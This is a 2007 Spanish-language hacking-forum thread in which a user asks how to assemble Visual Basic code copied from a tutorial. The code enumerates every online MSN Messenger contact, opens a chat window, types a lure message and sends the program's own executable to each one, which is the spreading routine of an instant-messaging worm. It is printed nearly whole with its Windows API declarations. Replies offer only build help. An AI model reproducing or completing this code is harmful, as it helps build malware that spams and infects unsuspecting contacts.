elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  ayuda con este codigo
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con este codigo  (Leído 2,107 veces)
<housedir>

Desconectado Desconectado

Mensajes: 199



Ver Perfil
ayuda con este codigo
« en: 12 Noviembre 2007, 16:47 pm »

hola a todos, bueno no se si esto va en esto va aquí pero bueno no se mucho de visual basic y no me interesa aprenderlo por los momentos estoy concentrado en otros lenguajes. tengo un codigo q saque de un tuto de hendrix q esta formado de la siguiente manera:
On Error GoTo NotCompatible
Set w = CreateObject("Messenger.UIAutomation")
For Each ConTacto In w.MyContacts 'Vamos de contacto en contacto
If ConTacto.Status = 2 Then 'Si el contacto esta OnLine...
Set iMsn = w.InstantMessage(ConTacto.SigninName) 'abrimos la ventana de chat
Call SpamMsn(iMsn.hwnd) 'Esta funcion es la que hace el trabajo
Next
End If
Exit Sub
NotCompatible:
MsgBox "No tienes MSN instalado en el sistema", vbCritical, "Error"
end

Private Sub SpamMsn(ByVal mHwnd)
On Error Resume Next
Dim l As Long, spam As String
l = FindWindowEx(mHwnd, 0, "DirectUIHWND", vbNullString) 'Buscamos esa clase dentro de la
ventana
If l = 0 Then Exit Sub 'Si no es asi, nos vamos al carajo
Call SendText(l, "***** Screen saber") 'Mensaje a enviar
EnviarFile App.Path & "\" & App.EXEName & ".exe", l 'Archivo a enviar
End Sub
Bien, empezemos con lo dificil. Primero la funcion para enviar texto. A esta funcion le tenemos
que pasa el handle de la ventana de chat y el texto a enviar. Usaremos las APIs siguientes:
GetForegroundWindow
SetForegroundWindow
PostMessage

Public Sub SendText(pIMWindow As Long, sText As String)
Dim hDirectUI As Long, hPrevWnd As Long
Dim i As Integer
hDirectUI = pIMWindow
Do
Call SetForegroundWindow(hDirectUI)
Loop Until GetForegroundWindow = hDirectUI
For i = 1 To Len(sText)
Call PostMessage(hDirectUI, WM_CHAR, Asc(Mid(sText, i, 1)), 0&)
Next i
Call PostMessage(hDirectUI, WM_KEYDOWN, VK_RETURN, 0&)
Call PostMessage(hDirectUI, WM_KEYUP, VK_RETURN, 0&)
End Sub

Public Function EnviarFile(ByVal DirPath As String, hwn As Long) As Boolean
Dim X As Long
Dim Edit As Long
Dim ParentHWnd As Long
Dim hWndText As String
Dim t As Single
Call PostMessage(GetWindowLong(hwn, GWL_HWNDPARENT), WM_COMMAND, 40275, 0)
DoEvents
X = GetWindow(GetDesktopWindow(), GW_CHILD)
hWndText = fWindowText(X)
t = Timer
Do Until (InStr(hWndText, "Enviar") <> 0 Or (InStr(hWndText, "Send") <> 0)
X = GetWindow(X, GW_HWNDNEXT)
hWndText = fWindowText(X)
If Format(Timer - t, "0.00") > 5 Then GoTo FIN
Loop
Edit = FindWindowEx(X, 0, "Edit", vbNullString)
If Edit = 0 Then
Edit = FindWindowEx(X, 0, "ComboBoxEx32", vbNullString)
Edit = FindWindowEx(Edit, 0, "ComboBox", vbNullString)
End If
If Edit = 0 Then Exit Function
Call SendMessageByString(Edit, WM_SETTEXT, 0, DirPath)
Call PostMessage(Edit, WM_KEYDOWN, VK_RETURN, 0&)
Call PostMessage(Edit, WM_KEYUP, VK_RETURN, 0&)
EnviarFile = True
FIN:
End Function


Luego me salen las declaraciones de apis y constantes pero public const me sale un error:

Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long,
ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long,
ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As
Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As
String, ByVal lpWindowName As String) As Long
Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As
Long, ByVal nIndex As Long) As Long
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function SetForegroundWindow Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetDesktopWindow Lib "user32" () As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wFlag As Long) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Const GW_HWNDFIRST = 0&
Private Const GW_HWNDNEXT = 2&
Private Const GW_CHILD = 5&
Public Const GWL_HWNDPARENT = (-8)
Public Const WM_SETTEXT = &HC
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_KEYDOWN = &H100
Public Const WM_KEYUP = &H101
Public Const WM_CHAR = &H102
Public Const WM_COMMAND = &H111
Public Const VK_RETURN = &HD


si alguien me puede decir como va ordenado ese codigo se los agredeceria mucho


En línea

Titulo: Padre nuestro
Padre Nuestro que estás en www.cielo.com
Santificado sea tu server, venga a nosotros tu shareware
Hágase tu downloading así en el http como en el ftp
Danos hoy nuestro surfing de cada día,
Perdona nuestros bugs
como nosotros también perdonamos a Microsoft.
No nos dejes caer en una Mac y líbranos de todo worm.
Enter...
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: ayuda con este codigo
« Respuesta #1 en: 12 Noviembre 2007, 17:04 pm »

Metes las declaraciones de las apis en un modulo, y no digas q no te interesa nada aprender VB, q desmotiva a ayudarte xDDD


En línea

<housedir>

Desconectado Desconectado

Mensajes: 199



Ver Perfil
Re: ayuda con este codigo
« Respuesta #2 en: 12 Noviembre 2007, 18:47 pm »

ok disculpa y gracias  ;D.
ahora tengo un problema al principio del codigo me aparece un error y me imagino q le falta una cabecera como a las demas partes del codigo q la tienen pero esta no:


Primero debemos comenzar accediendo al msn, a traves del objeto Messenger.UIAutomation.
Una vez hecho esto, iriamos de contacto en contacto, llamando a una funcion con el contacto
online como parametro.


On Error GoTo NotCompatible
Set w = CreateObject("Messenger.UIAutomation")
For Each ConTacto In w.MyContacts 'Vamos de contacto en contacto
If ConTacto.Status = 2 Then 'Si el contacto esta OnLine...
Set iMsn = w.InstantMessage(ConTacto.SigninName) 'abrimos la ventana de chat
Call SpamMsn(iMsn.hwnd) 'Esta funcion es la que hace el trabajo
Next
End If
Exit Sub
NotCompatible:
MsgBox "No tienes MSN instalado en el sistema", vbCritical, "Error"


cuando compilo me sale un error en "On Error GoTo NotCompatible" y me dice q el procedimiento externo no es valido

En línea

Titulo: Padre nuestro
Padre Nuestro que estás en www.cielo.com
Santificado sea tu server, venga a nosotros tu shareware
Hágase tu downloading así en el http como en el ftp
Danos hoy nuestro surfing de cada día,
Perdona nuestros bugs
como nosotros también perdonamos a Microsoft.
No nos dejes caer en una Mac y líbranos de todo worm.
Enter...
mos-k

Desconectado Desconectado

Mensajes: 13


Ver Perfil
........???
« Respuesta #3 en: 17 Noviembre 2007, 03:05 am »

hola a todos, bueno no se si esto va en esto va aquí pero bueno no se mucho de visual basic y no me interesa aprenderlo por los momentos estoy concentrado en otros lenguajes. tengo un codigo q saque de un tuto de hendrix

si alguien me puede decir como va ordenado ese codigo se los agredeceria mucho



si no te interesa para que kieres el codigo? o la ayuda?

"concentrate" en otros lenguajes....   >:(
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con este codigo!!
Programación C/C++
an_war 7 3,039 Último mensaje 25 Noviembre 2010, 06:16 am
por Beakman
Ayuda con este codigo
.NET (C#, VB.NET, ASP)
jacj0102 3 3,658 Último mensaje 7 Agosto 2011, 08:10 am
por neoncyber
Ayuda con este codigo .net
Desafíos - Wargames
tox0777 0 2,650 Último mensaje 23 Septiembre 2011, 06:46 am
por tox0777
ayuda con este codigo porfaavor
Programación C/C++
david0903 1 1,666 Último mensaje 30 Noviembre 2012, 18:41 pm
por durasno
Contestar al PING del irc. Ayuda con este codigo
Programación C/C++
70N1 1 1,492 Último mensaje 22 Mayo 2013, 16:08 pm
por 0xDani
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines